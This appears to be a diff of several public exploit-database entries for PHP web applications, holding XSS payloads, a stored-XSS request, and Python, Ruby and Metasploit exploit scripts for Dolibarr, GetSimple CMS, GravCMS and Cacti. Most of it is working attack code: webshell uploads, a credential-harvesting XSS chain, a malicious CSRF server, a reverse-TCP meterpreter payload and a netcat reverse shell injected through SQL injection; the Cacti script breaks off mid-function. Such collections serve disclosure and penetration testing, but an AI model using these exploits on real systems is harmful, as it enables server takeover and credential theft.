# Vulnerable parameters: 'Comments / Special Instructions :'
# Payload used:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
# POC: in the same page where we injected payload refresh the page.
# You will see your Javascript code (XSS) executed.

60
exploits/php/webapps/49607.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>
# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"
<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"
test123@gmail.com
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"
Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"
hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"
-----------------------------283640616528311462411171270636--
POC:
# go to url http://localhost:8080/quiz/register.php
# then you have to fill the above payload in name/username parameter
# then fill the remaining details
# then click submit
# then login to user account
# then attempt any one quiz after attempting go to ranking section then
# you can see xss pop up there..!

216
exploits/php/webapps/49711.py Executable file
View file

@ -0,0 +1,216 @@
# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
# Date: 16/06/2020
# Exploit Author: Andrea Gonzalez
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: Prior to 11.0.5
# Tested on: Debian 9.12
# CVE : CVE-2020-14209
#!/usr/bin/python3
# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested.
import re
import sys
import random
import string
import argparse
import requests
import urllib.parse
from urllib.parse import urlparse
session = requests.Session()
base_url = "http://127.0.0.1/htdocs/"
documents_url = "http://127.0.0.1/documents/"
proxies = {}
user_id = -1
class bcolors:
BOLD = '\033[1m'
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def printc(s, color):
print(f"{color}{s}{bcolors.ENDC}")
def read_args():
parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.')
parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.')
parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).')
parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").')
parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.')
parser.add_argument('--extension-bypass', dest='fbypass', action='store_true',
default=False,
help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.')
parser.add_argument('--file-renaming', dest='frenaming', action='store_true',
default=False,
help='A PHP script is uploaded and .php extension is added using file renaming function.')
parser.add_argument('--htaccess', dest='htaccess', action='store_true',
default=False,
help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.')
required = parser.add_argument_group('required named arguments')
required.add_argument('-u', '--user', help='Username', required=True)
required.add_argument('-p', '--password', help='Password', required=True)
return parser.parse_args()
def error(s, end=False):
printc(s, bcolors.HEADER)
if end:
sys.exit(1)
"""
Returns user id
"""
def login(user, password):
data = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": user,
"password": password
}
login_url = urllib.parse.urljoin(base_url, "index.php")
r = session.post(login_url, data=data, proxies=proxies)
try:
regex = re.compile(r"user/card.php\?id=(\d+)")
match = regex.search(r.text)
return int(match.group(1))
except Exception as e:
#error(e)
return -1
def upload(filename, payload):
files = {
"userfile": (filename, payload),
}
data = {
"sendit": "Send file"
}
headers = {
"Referer": base_url
}
upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies)
def delete(filename):
data = {
"action": "confirm_deletefile",
"confirm": "yes",
"urlfile": filename
}
headers = {
"Referer": base_url
}
delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(delete_url, headers=headers, data=data, proxies=proxies)
def rename(filename, new_filename):
data = {
"action": "renamefile",
"modulepart": "user",
"renamefilefrom": filename,
"renamefileto": new_filename,
"renamefilesave": "Save"
}
headers = {
"Referer": base_url
}
rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
session.post(rename_url, headers=headers, data=data, proxies=proxies)
def test_payload(filename, payload, query, headers={}):
file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query))
r = session.get(file_url, headers=headers, proxies=proxies)
if r.status_code != 200:
error("Error %d %s" % (r.status_code, file_url))
elif payload in r.text:
error("Non-executable %s" % file_url)
else:
printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN)
return True
return False
def get_random_filename():
return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
def upload_executable_file_php(payload, query):
php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"]
random_filename = get_random_filename()
b = False
for extension in php_extensions:
filename = random_filename + extension
upload(filename, payload)
if test_payload(filename, payload, query):
b = True
return b
def upload_executable_file_ssi(payload, command):
filename = get_random_filename() + ".shtml"
upload(filename, payload)
return test_payload(filename, payload, '', headers={'ACCEPT': command})
def upload_and_rename_file(payload, query):
filename = get_random_filename() + ".php"
upload(filename, payload)
rename(filename + ".noexe", filename)
return test_payload(filename, payload, query)
def upload_htaccess(payload, query):
filename = get_random_filename() + ".noexe"
upload(filename, payload)
filename_ht = get_random_filename() + ".htaccess"
upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n")
delete(".htaccess")
rename(filename_ht, ".htaccess")
return test_payload(filename, payload, query)
if __name__ == "__main__":
args = read_args()
base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/'
documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/")
documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/'
user = args.user
password = args.password
payload = "<?php system($_GET['cmd']) ?>"
payload_ssi = '<!--#exec cmd="$HTTP_ACCEPT" -->'
command = args.cmd
query = "cmd=%s" % command
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
user_id = login(user, password)
if user_id < 0:
error("Login error", True)
printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN)
print('-' * 30)
if not args.fbypass and not args.frenaming and not args.htaccess:
args.fbypass = args.frenaming = args.htaccess = True
if args.fbypass:
printc("Trying extension-bypass method\n", bcolors.BOLD)
b = upload_executable_file_php(payload, query)
b = upload_executable_file_ssi(payload_ssi, command) or b
if b:
printc("\nextension-bypass was successful", bcolors.OKBLUE)
else:
printc("\nextension-bypass was not successful", bcolors.WARNING)
print('-' * 30)
if args.frenaming:
printc("Trying file-renaming method\n", bcolors.BOLD)
if upload_and_rename_file(payload, query):
printc("\nfile-renaming was successful", bcolors.OKBLUE)
else:
printc("\nfile-renaming was not successful", bcolors.WARNING)
print('-' * 30)
if args.htaccess:
printc("Trying htaccess method\n", bcolors.BOLD)
if upload_htaccess(payload, query):
printc("\nhtaccess was successful", bcolors.OKBLUE)
else:
printc("\nhtaccess was not successful", bcolors.WARNING)
print('-' * 30)

125
exploits/php/webapps/49726.py Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: March 29th, 2021
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: v3.3.16
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
# Vulnerability Description:
# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
# Exploit Description:
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
# Attack Chain:
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
# 2. Admin then enters their credentials into the GetSimple CMS login portal
# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
import sys,re,argparse,requests
from urllib.parse import quote
from colorama import (Fore as F, Back as B, Style as S)
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
def webshell(SERVER_URL):
try:
WEB_SHELL = SERVER_URL
getdir = {'FierceGodKick': 'echo %CD%'}
r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
status = r.status_code
cwd = re.findall(r'[CDEF].*', r.text)
if cwd:
cwd = cwd[0]+"> "
term = SB+FG+cwd+FT
print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
while True:
thought = input(term)
command = {'FierceGodKick': thought}
r = requests.post(WEB_SHELL, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
else:
r.raise_for_status()
except:
pass
def urlEncode(javascript):
return quote(javascript)
def genXssPayload():
XSS_PAYLOAD = '/index/javascript:'
XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
XSS_PAYLOAD += 'r=this.responseXML;'
XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
XSS_PAYLOAD += 'xhr3.send(params);'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
XSS_PAYLOAD += 'xhr2.responseType="document";'
XSS_PAYLOAD += 'xhr2.send();'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr1.send(params);'
XSS_PAYLOAD += '%2f%2f'
return XSS_PAYLOAD
def argsetup():
about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
args = parser.parse_args()
return args
if __name__ == "__main__":
print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
args = argsetup()
RHOST = args.TargetSite
WEBAPP_URL = RHOST+'/admin/'
WEBAPP_URL = WEBAPP_URL+'index.php'
PAYLOAD = genXssPayload()
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
sleep(1)
print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
while True:
sleep(1)
webshell(RHOST)

158
exploits/php/webapps/49774.py Executable file
View file

@ -0,0 +1,158 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 15/04/2021
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
# Vendor: NetExplorer
# Version: <= v1.1.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox
# About My SMTP Contact Plugin:
# An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
# CSRF Vulnerability Information:
# The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
# PHP Code Injection Vulnerability Information:
# When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation.
# Exploit Description:
# The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(author)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def generateCsrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_email_to" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_smtp_or_standard" value="standard">'
payload += '<input type="hidden" name="m_smtp_c_digital_captcha" value="on">'
payload += '<input type="hidden" name="m_smtp_c_digitSalt" value="TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR">'
payload += '<input type="hidden" name="m_smtp_c_agree_checkbox" value="on">'
payload += '<input type="hidden" name="m_smtp_c_client_server" value="client_server">'
payload += '<input type="hidden" name="m_smtp_c_window_msg" value="on">'
payload += '<input type="hidden" name="m_smtp_c_default_css" value="on">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="boku">'
payload += '<input type="hidden" name="m_smtp_c_subject" value="RCE">'
payload += '<input type="hidden" name="m_smtp_c_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_password" value="password123">'
payload += '<input type="hidden" name="m_smtp_c_email_from_ssl" value="ssl://smtp.0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_port" value="777">'
payload += '<input type="hidden" name="m_smtp_c_standard_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="62605e65e25ab30">'
payload += '<input type="hidden" name="my_smtp_c_selected_name" value="asd">'
payload += '<input type="hidden" name="m_smtp_c_alternative_fields" value="off">'
payload += '<input type="hidden" name="m_smtp_c_qty_fields" value="1">'
payload += '<input type="hidden" name="m_smtp_c_limit_file_size" value="1">'
payload += '<input type="hidden" name="m_smtp_c_valid_file_format" value="jpeg">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name[]" value="User name">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name_ok[]" value="ok">'
payload += '<input type="hidden" name="m_smtp_c_arr_tags_Name[]" value="0">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Required[]" value="required">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Type[]" value="text">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Maxlength[]" value="50">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Code[]" value="{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST)
print(banner)
print('Listening for Victims to connect..')
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
def tryUploadWebshell(target,contact):
try:
blind = target+contact
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def argsetup():
about = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. '
about += FR+'CVSS Base Score: 9.6 | '
about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = argsetup()
target = args.TargetSite
contact = args.SMTPContactPage
threadshed = theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,contact)
sleep(2)
pwnt = checkWebshell(target)
print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
webshell(target)

160
exploits/php/webapps/49788.rb Executable file
View file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GravCMS Remote Command Execution',
'Description' => %q{
This module exploits arbitrary config write/update vulnerability to achieve remote code execution.
Unauthenticated users can execute a terminal command under the context of the web server user.
Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages.
In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without
needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of
existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability,
an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command
under the context of the web-server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2021-21425'],
['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
],
'Privileged' => true,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' =>
{
'payload' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64',
'WfsDelay' => 90
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2021-03-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
CONFIG_CHANGES # user/config/scheduler.yaml
]
}
)
)
end
def check
# During the fix, developers changed admin-nonce to login-nonce.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
if res && !res.get_hidden_inputs.first['admin-nonce'].nil?
CheckCode::Appears
else
CheckCode::Safe
end
end
def capture_cookie_token
print_status 'Sending request to the admin path to generate cookie and token'
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
# Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value
if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil?
print_good 'Cookie and CSRF token successfully extracted !'
else
fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.'
end
@cookie = res.get_cookies
@admin_nonce = res.get_hidden_inputs.first['admin-nonce']
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
end
capture_cookie_token
@task_name = Rex::Text.rand_text_alpha_lower(5)
# Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's
# parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the
# payload with a double quote is necessary to command executed successfully.
payload.encoded.sub! 'base64_decode(', 'base64_decode("'
payload.encoded.sub! '));', '"));'
print_status 'Implanting payload via scheduler feature'
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php',
"data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}",
"data[custom_jobs][#{@task_name}][at]" => '* * * * *',
"data[custom_jobs][#{@task_name}][output]" => '',
"data[status][#{@task_name}]" => 'enabled',
"data[custom_jobs][#{@task_name}][output_mode]" => 'append'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'Scheduler successfully created ! Wait for 1 minute...'
end
end
def on_new_session
print_status 'Cleaning up the the scheduler...'
# Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling
# the scheduler without any parameter:) It will leave the only command name in the config file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[status][#{@task_name}]" => 'enabled'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'The scheduler config successfully cleaned up!'
end
end
end

92
exploits/php/webapps/49810.py Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
# Date: 04/28/2021
# Exploit Author: Leonardo Paiva
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
# Version: 1.2.12
# Tested on: Ubuntu 20.04
# CVE : CVE-2020-14295
# Credits: @M4yFly (https://twitter.com/M4yFly)
# References:
# https://github.commandcom/Cacti/cacti/issues/3622
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
#!/usr/bin/python3
import argparse
import requests
import sys
import urllib.parse
from bs4 import BeautifulSoup
# proxies = {'http': 'http://127.0.0.1:8080'}
def login(url, username, password, session):
print("[+] Connecting to the server...")
get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
print("[+] Retrieving CSRF token...")
html_content = get_token_request.text
soup = BeautifulSoup(html_content, 'html.parser')
csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
if csrf_token:
print(f"[+] Got CSRF token: {csrf_token}")
print("[+] Trying to log in...")
data = {
'__csrf_magic': csrf_token,
'action': 'login',
'login_username': username,
'login_password': password
}
login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
if "Invalid User Name/Password Please Retype" in login_request.text:
print("[-] Unable to log in. Check your credentials")
sys.exit()
else:
print("[+] Successfully logged in!")
else:
print("[-] Unable to retrieve CSRF token!")
sys.exit()
def exploit(lhost, lport, session):
rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
